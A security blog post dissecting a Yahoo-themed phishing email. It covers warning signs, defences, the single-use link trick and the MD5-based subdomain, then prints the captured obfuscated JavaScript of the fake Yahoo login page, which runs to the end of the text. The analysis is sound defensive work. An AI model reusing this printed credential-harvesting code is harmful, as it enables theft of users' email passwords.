I've had this post half-written for a couple of months, and in the interim received two more phishing emails following the same pattern. Over the weekend, a peer in the security industry mentioned he had received a phishing scam that followed this pattern but in a more carefully-crafted package tailored to look like an important message from the president of his actual homeowners' association. @GRC_Ninja has a great write-up of that particular event, with some sage advice from an employer's perspective. What follows is my advice from a consumer perspective, and then a dive into the weeds.
Some phishing approaches are carefully crafted, highly targeted, and nigh impossible to recognize as evil. Some phishing approaches are ridiculously lame and downright silly. And then there is this, from the email account of someone I do know and correspond with. Devilishly simple, and yet entirely believable, who wouldn't click on the link to see what the actual message is?
The email appears to be something that Yahoo! Mail could not display in the normal reader window, and which you must open into its own window in order to read. The "error message" at the bottom lends credibility to the scam. Those with digital rights management on their business email might even be used to messages that cannot render in the standard email reader.
Despite appearances though, this is a fake, a fake for which the three best defenses are
- A password manager such as LastPass or 1Password that recognizes website domains and will not enter your password into a fake login screen;
- Two-factor authentication such that if a scammer does get your password, they still cannot log in without also having your device; and
- A DNS resolver such as OpenDNS, that recognizes scam domains and prevents your browser from going there.
Phishing Scam Clues
Many phishing messages will either come from a stranger, or from a fake email account with a name that matches someone you know. In this case however, the message was in fact sent from the real email account of someone I know. As diabolically clever as this scam is though, there are still a few clues that it is not legitimate. The first clue is found by hovering over the link:
Neither the tooltip (the link description that pops up near your mouse cursor) nor the URL displayed in the status bar at the bottom of the screen, look anything like yahoo.com. Of course, a clever attacker can manipulate the popup description to look legitimate, so just because something looks real is no guarantee that it is real. In this case though, they made no attempt to disguise the link.
A second, slightly more subtle clue, is the time in the error message. ART is Argentina Time, but both I and the person whose email account this message came from are in Texas. While it is certainly possible the sender was in fact travelling to Argentina, I would expect any real error related to opening the message from my mailbox, to be in my local timezone.
A third and less obvious clue is the error message itself: a quick search for Yahoo error code 1265 does not turn up anything real. In other words, there is no such thing as a Yahoo error code 1265.
So at a glance, I was fairly certain this was a phishing attempt, though it's clever enough that I might easily have clicked the link without thinking. That's precisely what a phishing scam counts on: the goal is for the victim to act before thinking, to as quickly as possible move past the point of suspicion and fall into the attacker's trap. Once in the attacker's trap, there are rarely any further clues to arouse suspicion.
Diving Deeper
At this point I did what any self-respecting hacker would do.
I clicked the link.
Unless you know what you are doing, please DON'T click the link! I opened the link from a virtual machine, a "sandbox" of sorts that is separate from my everyday-use computers, so that anything malicious would be contained to that sandbox and not infect my real life.
The link in the email message goes to:
After a few seconds, what looks like an older Yahoo login screen appears. It does not match the current login screen used by Yahoo, but it looks very much like one previously used by the company. If I were not paying attention, I might very easily be fooled.
Interestingly, the screen is pre-populated with my email address, even though at first glance my address is not anywhere in the querystring. The thought crossed my mind that some of the query parameters might be base64-encoded plaintext, but that does not appear to be the case.
Ahh, but a portion of the domain turns out to be the first 19 digits of an MD5 hash - specifically, the hash for my email address. Since a hash is a one-way function, there is no way to "unhash" it and get back the email address, so I am presuming the scammer's tool stored a list of email addresses and hashes, and either uses this as a lookup value or as a validation check. Upon visiting the website, the server uses this value to lookup the victim and serve the appropriate page.
The actual MD5 for the recipient's email address is 1f43f954e11b6feb9cbc89a371714db6. The portion of this hash that appears in the domain is obviously not a coincidence.
The last parameter also looks like an MD5 hash - it's a 32-character hexadecimal string made up of the numbers [0-9] and the letters [a-f]. In this case though, I have not yet discovered what is being hashed.
Here is where things get a bit more interesting: I cannot reload the fake Yahoo login screen. Every subsequent attempt to click the link either brings me to an advertisement for some "brain-boosting drug," or to a (fake) "Windows System Alert" warning that "YOUR MICROSOFT COMPUTER HAS BEEN BLOCKED."
It turns out the malicious link in the phishing email was booby-trapped. The evil payload (the phishing page to steal Yahoo Mail credentials) displays only on the first click.
Server-side click tracking is fairly sophisticated for a phishing scam, but that is apparently what is going on here. I tried re-running my test from another virtual machine, and even from another IP address, just to be certain there was nothing cached local. The server is keeping track of the link to ensure it is not reused, presumably as an anti-forensics technique to counteract forensic analysis.
It's a good thing I logged the first click.
The server for msgccb[.]com replied with an HTTP 302 message - "I've moved, and here's my forwarding address." The forward address was:
Notice that the querystring - all the parameters following the "?" - match the querystring from the original link. Only the domain and webpage have changed.
The response to this request is the following obfuscated JavaScript:
<script>eval(unescape("%75%6E%65%73%63%61%70%65%3D%66%75%6E%63%74%69%6F%6E%20%28%61%37%65%37%37%35%37%62%31%65%31%32%61%62%63%62%37%33%36%61%62%39%61%37%35%34%66%66%62%36%31%37%61%2C%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%2C%61%63%61%66%31%61%33%64%66%62%35%30%35%66%66%65%64%30%64%30%32%34%31%33%30%66%35%38%63%35%63%66%61%29%7B%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%37%65%37%37%35%37%62%31%65%31%32%61%62%63%62%37%33%36%61%62%39%61%37%35%34%66%66%62%36%31%37%61%3B%66%6F%72%28%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%3D%30%3B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%3C%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%2E%6C%65%6E%67%74%68%3B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%2B%2B%29%7B%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%5B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%5D%2C%22%67%22%29%2C%61%63%61%66%31%61%33%64%66%62%35%30%35%66%66%65%64%30%64%30%32%34%31%33%30%66%35%38%63%35%63%66%61%5B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%5D%29%3B%7D%20%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%22%25%32%36%22%2C%20%22%67%22%29%2C%20%22%26%22%29%3B%20%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%22%25%33%42%22%2C%20%22%67%22%29%2C%20%22%3B%22%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%27%3C%21%2D%2D%3F%2D%2D%3E%3C%3F%27%2C%27%3C%21%2D%2D%3F%2D%2D%3E%27%29%29%3B%20%61%37%65%37%37%35%37%62%31%65%31%32%61%62%63%62%37%33%36%61%62%39%61%37%35%34%66%66%62%36%31%37%61%3D%22%22%3B%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%3D%22%22%3B%61%63%61%66%31%61%33%64%66%62%35%30%35%66%66%65%64%30%64%30%32%34%31%33%30%66%35%38%63%35%63%66%61%3D%22%22%3B%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%22%22%3B%7D")); eval(unescape("&51;&49;&63;&47;&17;&44;&38;&18;&11; &35;&16;&20;&34;&31;&51;&35;&16;&20;&34; &34;&50;&1;&57;&59;\"&13;&1;&46;&2;&23;\" &42;&34;&50;&37;&37;&59;\"yui3-js-enabled\"&31;&51;&35;&13;&50;&65;&31;&51;&20;&13;&16;&50; &35;&16;&16;&32;&46;&13;&0;&58;&41;&6;&59;\"&17;&60;&1;&16;&13;&1;&16;&46;&44;&25;&32;&13;\" &42;&60;&1;&16;&13;&1;&16;&59;\"&16;&13;&3;&16;\/&35;&16;&20;&34;; &42;&35;&50;&40;&37;&13;&16;&59;&2;&44;&5;&46;8\"&31;&51;&16;&41;&16;&34;&13;&31;&38;&50;&35;&60;&60; &46; &34;&60;&57;&41;&1;&51;\/&16;&41;&16;&34;&13;&31;&51;&20;&13;&16;&50; &1;&50;&20;&13;&59;\"viewport\" &42;&60;&1;&16;&13;&1;&16;&59;\"&41;&1;&41;&16;&41;&50;&34;&46;&37;&42;&50;&34;&13;&59;1, &20;&50;&3;&41;&20;&58;&20;&46;&37;&42;&50;&34;&13;&59;1, &20;&41;&1;&41;&20;&58;&20;&46;&37;&42;&50;&34;&13;&59;1, &58;&37;&13;&40;&46;&37;&42;&50;&34;&50;&33;&34;&13;&59;&1;&60;\"&31;&51;&34;&41;&1;&26; &40;&13;&34;&59;\"&37;&16;&25;&34;&13;&37;&35;&13;&13;&16;\" &16;&25;&32;&13;&59;\"text/css\" &35;&40;&13;&8;&59;\"/yhmv&27;files/combo.css\"&31;&51;\/&35;&13;&50;&65;&31; &51;&33;&60;&65;&25; &60;&1;&34;&60;&50;&65;&59;\"&8;1.&32;.&8;&60;&42;&58;&37;&48;&15;;\" &42;&34;&50;&37;&37;&59;\"ios-dynamic-font\"&31;&51;&65;&41;&6; &41;&65;&59;\"mbr-mobile-login\" &42;&34;&50;&37;&37;&59;\"mbr-login mbr-mb \"&31;&51;&37;&42;&40;&41;&32;&16;&31;&6;&50;&40; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57; &59; &61;&33;&50;&37;&13;&23;&32;&50;&42;&13;&54;&63; : \"150002880\",&38;&9;&28;&18;&40;&60;&10;&13;&42;&16;&54;&63; : 10001756605956,&63;&60;&42;&58;&20;&13;&1;&16;&24;&50;&20;&13; : \"&14;&60;&33;&41;&34;&13; &30;&60;&57;&41;&1;\",&63;&60;&42;&58;&20;&13;&1;&16;&55;&40;&60;&58;&32;: \"&14;&60;&33;&41;&34;&13; &30;&60;&57;&41;&1;\",&33;&60;&58;&1;&42;&13;&40;&27;&34;&60;&57;&41;&1;: \"&35;&16;&16;&32;&37;:\/\/&34;&60;&57;&41;&1;.&25;&50;&35;&60;&60;.&42;&60;&20;\/&42;&60;&1;&8;&41;&57;\/&34;&60;&57;&41;&1;?.&32;&50;&40;&16;&1;&13;&40;&59;&25;&42;&60;&40;&32;&.&37;&40;&42;&59;&25;&20;&&20;&35;&60;&59;1&.&65;&60;&1;&13;&59;&35;&16;&16;&32;&37;%3&28;%2&5;%2&5;&20;&50;&41;&34;.&25;&50;&35;&60;&60;.&42;&60;&20;\"&62;;&51;\/&37;&42;&40;&41;&32;&16;&31;&51;&20;&50;&41;&1; &40;&60;&34;&13;&59;\"&20;&50;&41;&1;\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;25\" &37;&16;&25;&34;&13;&59;\"&46;&22;&13;&33;&26;&41;&16;&46;&58;&37;&13;&40;&46;&37;&13;&34;&13;&42;&16;: &1;&60;&1;&13;; &16;&60;&58;&42;&35;&46;&50;&42;&16;&41;&60;&1;: &32;&50;&1;&46;&25;; &46;&22;&13;&33;&26;&41;&16;&46;&58;&37;&13;&40;&46;&65;&40;&50;&57;: &1;&60;&1;&13;; &46;&22;&13;&33;&26;&41;&16;&46;&16;&50;&32;&46;&35;&41;&57;&35;&34;&41;&57;&35;&16;&46;&42;&60;&34;&60;&40;: &40;&57;&33;&50;&48;0, 0, 0, 0&15;;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-main\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;106\"&31;&51;&35;&13;&50;&65;&13;&40; &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;105\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-mb-hdr\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"header-container\"&31;&51;&41;&20;&57; &37;&40;&42;&59;\"/yhmv&27;files/yahoo&27;en-US&27;f&27;p&27;bestfit&27;2x.png\" &50;&34;&16;&59;\"Yahoo\"&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&35;&13;&50;&65;&13;&40;&31;&51;&32; &42;&34;&50;&37;&37;&59;\"mbr-mb-login-title mbr-text-13\"&31;Sign in to your account&51;\/&32;&31;&51;&8;&60;&40;&20; &20;&13;&16;&35;&60;&65;&59;\"post\" &1;&50;&20;&13;&59;\"f1\" &41;&65;&59;\"\" &50;&42;&16;&41;&60;&1;&59;\"\" &42;&34;&50;&37;&37;&59;\"pure-form pure-form-stacked mbr-mb-login-frm\" &1;&60;&6;&50;&34;&41;&65;&50;&16;&13;&59;\"\"&31; &51;&8;&41;&13;&34;&65;&37;&13;&16; &42;&34;&50;&37;&37;&59;\"pure-group mb-fset\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;108\"&31; &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"username-field pure-g focus\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;107\"&31; &51;&65;&41;&6; &41;&65;&59;\"login-country-code-field\" &42;&34;&50;&37;&37;&59;\"pure-u selected-country-code narrow mbr-hide\"&31; &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"select-country-code mbr-hide\" &41;&65;&59;\"login-country-code\"&31; &51;&37;&32;&50;&1; &41;&65;&59;\"login-country-name\" &42;&34;&50;&37;&37;&59;\"mbr-hide\"&31;United States (+1)&51;\/&37;&32;&50;&1;&31; &51;&37;&32;&50;&1;&31;+1&51;\/&37;&32;&50;&1;&31; &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"country-code-arrow-container\"&31;&51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"country-code-arrow\"&31;&51;\/&37;&32;&50;&1;&31;&51;\/&37;&32;&50;&1;&31; &51;\/&65;&41;&6;&31; &51;&34;&50;&33;&13;&34; &42;&34;&50;&37;&37;&59;\"mbr-hide\" &8;&60;&40;&59;\"login-select-country-code\"&31;&17;&60;&58;&1;&16;&40;&25; &20;&13;&1;&58;&51;\/&34;&50;&33;&13;&34;&31; &51;\/&65;&41;&6;&31; &51;&41;&1;&32;&58;&16; &41;&65;&59;\"login-username\" &16;&25;&32;&13;&59;\"email\" &1;&50;&20;&13;&59;\"username\" &42;&34;&50;&37;&37;&59;\"pure-input-1 \" &50;&40;&41;&50;&46;&40;&13;&0;&58;&41;&40;&13;&65;&59;\"&16;&40;&58;&13;\" &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&59;\"&11;&20;&50;&41;&34; &50;&65;&65;&40;&13;&37;&37;\" &50;&58;&16;&60;&42;&60;&40;&40;&13;&42;&16;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&60;&20;&32;&34;&13;&16;&13;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&50;&32;&41;&16;&50;&34;&41;&19;&13;&59;\"&60;&8;&8;\" &16;&41;&16;&34;&13;&59;\"Email address\" &6;&50;&34;&58;&13;&59;\"dnlongen@yahoo.com\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"1\"&31; &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"pure-u-1 close-icon close-icon-uname mbr-hide\"&31; &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"close-icon close-icon-button\"&31;&51;\/&37;&32;&50;&1;&31; &51;\/&65;&41;&6;&31; &51;\/&65;&41;&6;&31; &51;&65;&41;&6; &41;&65;&59;\"passwd-field\" &42;&34;&50;&37;&37;&59;\"passwd-field has-message \"&31; &51;&41;&1;&32;&58;&16; &41;&65;&59;\"login-passwd\" &16;&25;&32;&13;&59;\"password\" &42;&34;&50;&37;&37;&59;\"pure-input-1 \" &50;&40;&41;&50;&46;&40;&13;&0;&58;&41;&40;&13;&65;&59;\"&16;&40;&58;&13;\" &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&59;\"&18;&50;&37;&37;&22;&60;&40;&65;\" &50;&58;&16;&60;&42;&60;&40;&40;&13;&42;&16;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&60;&20;&32;&34;&13;&16;&13;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&50;&32;&41;&16;&50;&34;&41;&19;&13;&59;\"&60;&8;&8;\" &1;&50;&20;&13;&59;\"p\" &16;&41;&16;&34;&13;&59;\"Password\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"2\"&31; &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"pure-u-1 close-icon close-icon-passwd mbr-hide\"&31; &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"close-icon close-icon-button\"&31;&51;\/&37;&32;&50;&1;&31; &51;\/&65;&41;&6;&31; &51;&65;&41;&6; &41;&65;&59;\"login-passwd-message\" &42;&34;&50;&37;&37;&59;\"passwd-message pure-u-1 mbr-hide\"&31; Tap continue to receive an on-demand password. &51;\/&65;&41;&6;&31; &51;\/&65;&41;&6;&31; &51;\/&8;&41;&13;&34;&65;&37;&13;&16;&31; &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"mbr-error mbr-hide\" &41;&65;&59;\"mbr-error\" &40;&60;&34;&13;&59;\"&50;&34;&13;&40;&16;\" &42;&60;&65;&13;&59;\"0\"&31;&51;\/&37;&32;&50;&1;&31; &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"mbr-error mbr-hide\" &41;&65;&59;\"nw-error\" &40;&60;&34;&13;&59;\"&50;&34;&13;&40;&16;\"&31;Network connection timed out. Please try again.&51;\/&37;&32;&50;&1;&31; &51;&33;&58;&16;&16;&60;&1; &16;&25;&32;&13;&59;\"submit\" &42;&34;&50;&37;&37;&59;\"pure-button pure-u-1 puree-button-primary mbr-button-purple \" &1;&50;&20;&13;&59;\"signin\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&37;&34;&26;&59;\"&37;&41;&57;&1;&41;&1;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"3\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"login-signin\"&31;Sign In&51;\/&33;&58;&16;&16;&60;&1;&31; &51;&65;&41;&6; &41;&65;&59;\"yahoo-japan-container\" &42;&34;&50;&37;&37;&59;\"mbr-hide\"&31; &51;&50; &35;&40;&13;&8;&59;\"http://www.yahoo-help.jp/app/answers/detail/p/565/a&27;id/47713?soc&27;src=mail&soc&27;trk=ma\" &42;&34;&50;&37;&37;&59;\"pure-u-1 pure-button \" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"4\"&31; Visit Yahoo Help &51;\/&50;&31; &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-login-oauth2-yahoo-japan-msg\"&31; Yahoo Japan users - please visit Yahoo Help to learn how to add your email address. &51;\/&65;&41;&6;&31; &51;\/&65;&41;&6;&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"&27;ts\" &6;&50;&34;&58;&13;&59;\"1443564313\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;26\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"5\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"&27;tpa\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;27\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"6\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"&27;muh\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;28\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"7\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"&27;crumb\" &6;&50;&34;&58;&13;&59;\"iTFuEtgy.rG\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;29\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"8\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"&27;uuid\" &6;&50;&34;&58;&13;&59;\"p7zJ4A0uHOfy\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;30\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"9\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"&27;seqid\" &6;&50;&34;&58;&13;&59;\"2\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;31\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"10\"&31;&51;&41;&20;&57; &37;&40;&42;&59;\"http://whos.amung.us/swidget/pulentasu.png\" &22;&41;&65;&16;&35;&59;0 &35;&13;&41;&57;&35;&16;&59;0 \/&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"otp&27;channel\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;32\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"11\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\"otp&27;ref&27;cc&27;intl\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;33\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"12\"&31;&51;\/&8;&60;&40;&20;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"pure-u-1 mbr-hide\"&31; &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-otp-link\"&31; &51;&8;&60;&40;&20; &20;&13;&16;&35;&60;&65;&59;\"GET\" &50;&42;&16;&41;&60;&1;&59;\"\" &42;&34;&50;&37;&37;&59;\"pure-form mbr-mb-login-frm\" &1;&60;&6;&50;&34;&41;&65;&50;&16;&13;&59;\"\"&31; &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"hidden\" &1;&50;&20;&13;&59;\".otp\" &6;&50;&34;&58;&13;&59;\"y\" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564315012&27;34\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"13\"&31; &51;&33;&58;&16;&16;&60;&1; &41;&65;&59;\"login-otp\" &16;&25;&32;&13;&59;\"submit\" &42;&34;&50;&37;&37;&59;\"mbr-button-text\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"14\"&31;MBR&27;OTP&27;SIGNIN&27;USING&27;MOBILE&27;NUMBER&51;\/&33;&58;&16;&16;&60;&1;&31; &51;\/&8;&60;&40;&20;&31; &51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;&37;&42;&40;&41;&32;&16;&31; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&60;&16;&32;&27;&13;&1;&50;&33;&34;&13;&65; &59; &8;&50;&34;&37;&13;; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&60;&16;&32;&27;&60;&32;&16;&41;&1; &59; &16;&40;&58;&13;; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&37;&16;&40;&41;&1;&57;&37; &59; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&37;&16;&40;&41;&1;&57;&37; || &61; &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&27;&20;&60;&33;&41;&34;&13;&27;&1;&58;&20;&33;&13;&40;: \"&14;&60;&33;&41;&34;&13; &1;&58;&20;&33;&13;&40;\", &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&27;&58;&37;&13;&40;&1;&50;&20;&13; : \"&11;&20;&50;&41;&34; &50;&65;&65;&40;&13;&37;&37;\", &37;&41;&57;&1;&27;&41;&1;: \"&23;&41;&57;&1; &54;&1;\", &57;&13;&16;&27;&20;&25;&27;&32;&50;&37;&37;&22;&65;: \"&17;&60;&1;&16;&41;&1;&58;&13;\", &37;&41;&57;&1;&41;&1;&27;&42;&60;&1;&16;&41;&1;&58;&13;: \"&17;&60;&1;&16;&41;&1;&58;&13;\", &60;&65;&32;&27;&32;&50;&37;&37;&22;&60;&40;&65;&27;&65;&13;&37;&42;: \"&44;&50;&32; &42;&60;&1;&16;&41;&1;&58;&13; &16;&60; &40;&13;&42;&13;&41;&6;&13; &50;&1; &60;&1;&46;&65;&13;&20;&50;&1;&65; &32;&50;&37;&37;&22;&60;&40;&65;.\", &60;&65;&32;&27;&32;&58;&37;&35;&27;&65;&13;&37;&42;: \"&44;&50;&32; &42;&60;&1;&16;&41;&1;&58;&13; &16;&60; &58;&37;&13; &28;&42;&42;&60;&58;&1;&16; &52;&13;&25;.\", &13;&40;&40;&60;&40;&27;&58;&37;&13;&40;&1;&50;&20;&13;&27;&32;&50;&37;&37;&22;&65;: \"&54;&1;&6;&50;&34;&41;&65; &58;&37;&13;&40;&1;&50;&20;&13;\/&32;&50;&37;&37;&22;&60;&40;&65;. &18;&34;&13;&50;&37;&13; &16;&40;&25; &50;&57;&50;&41;&1;.\", &13;&40;&40;&60;&40;&27;&41;&1;&6;&50;&34;&41;&65;&27;&32;&50;&37;&37;&22;&65;: \"&44;&35;&50;&16; &65;&41;&65;&1;\u2019&16; &22;&60;&40;&26;. &18;&34;&13;&50;&37;&13; &16;&25;&32;&13; &25;&60;&58;&40; &60;&1;&46;&65;&13;&20;&50;&1;&65; &32;&50;&37;&37;&22;&60;&40;&65; &50;&57;&50;&41;&1;.\", &13;&40;&40;&60;&40;&27;&13;&20;&32;&16;&25;&27;&32;&50;&37;&37;&22;&65;: \"&38;&60;&58;&40; &60;&1;&46;&65;&13;&20;&50;&1;&65; &32;&50;&37;&37;&22;&60;&40;&65; &41;&37; &40;&13;&0;&58;&41;&40;&13;&65;.\", &60;&16;&32;&27;&40;&13;&16;&40;&25;&27;&20;&13;&37;&37;&50;&57;&13;: \"&18;&34;&13;&50;&37;&13; &22;&50;&41;&16; &61;0&62; &37;&13;&42;&60;&1;&65;&37; &33;&13;&8;&60;&40;&13; &16;&40;&25;&41;&1;&57; &16;&60; &40;&13;&37;&13;&1;&65;.\", &60;&16;&32;&27;&40;&13;&16;&40;&25;&27;&20;&13;&37;&37;&50;&57;&13;&27;&60;&1;&13;: \"&18;&34;&13;&50;&37;&13; &22;&50;&41;&16; &50; &37;&13;&42;&60;&1;&65; &33;&13;&8;&60;&40;&13; &16;&40;&25;&41;&1;&57; &16;&60; &40;&13;&37;&13;&1;&65;.\", &13;&1;&65;&27;&60;&8;&27;&37;&16;&40;&41;&1;&57;: \"&11;&47;&23;\" &62;; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&34;&41;&42;&26;&27;&16;&60;&27;&65;&41;&37;&20;&41;&37;&37;&27;&37;&32;&41;&1;&1;&13;&40;&27;&34;&60;&57;&41;&1; &59; 1; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&34;&41;&42;&26;&27;&16;&60;&27;&65;&41;&37;&20;&41;&37;&37;&27;&37;&32;&41;&1;&1;&13;&40;&27;&42;&50;&32;&16;&42;&35;&50; &59; 1; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&41;&37;&27;&50;&37;&65;&26; &59; 0; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&58;&37;&13;&27;&60;&65;&32;&27;&58;&37;&13;&40;&1;&50;&20;&13;&27;&20;&60;&1;&41;&16;&60;&40; &59; &8;&50;&34;&37;&13;; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&41;&37;&27;&60;&50;&58;&16;&35;2 &59; &8;&50;&34;&37;&13;;&14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&60;&50;&58;&16;&35;2&27;&25;&50;&35;&60;&60;&27;&10;&50;&32;&50;&1;&27;&40;&13;&65;&41;&40;&13;&42;&16;&27;&58;&40;&34; &59; 